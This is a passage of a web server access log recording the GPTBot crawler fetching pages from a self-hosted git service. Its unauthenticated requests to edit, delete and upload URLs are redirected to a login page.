[Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:33:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:17:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/main.py" -[17/Feb/2026:17:33:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:17:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/main.py" -[17/Feb/2026:17:33:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 11303] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 9772] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:17:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 9770] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" -[17/Feb/2026:17:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:17:33:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:33:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:33:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:33:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" -[17/Feb/2026:17:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode" -[17/Feb/2026:17:33:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:33:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 52] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 10353] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 9783] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20391] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20389] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11844] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:17:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10122] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:17:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110385] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:17:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110384] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:17:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110354] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:17:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14739] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:17:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&state=open&type=all" -[17/Feb/2026:17:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&state=open&type=all" -[17/Feb/2026:17:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17127] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 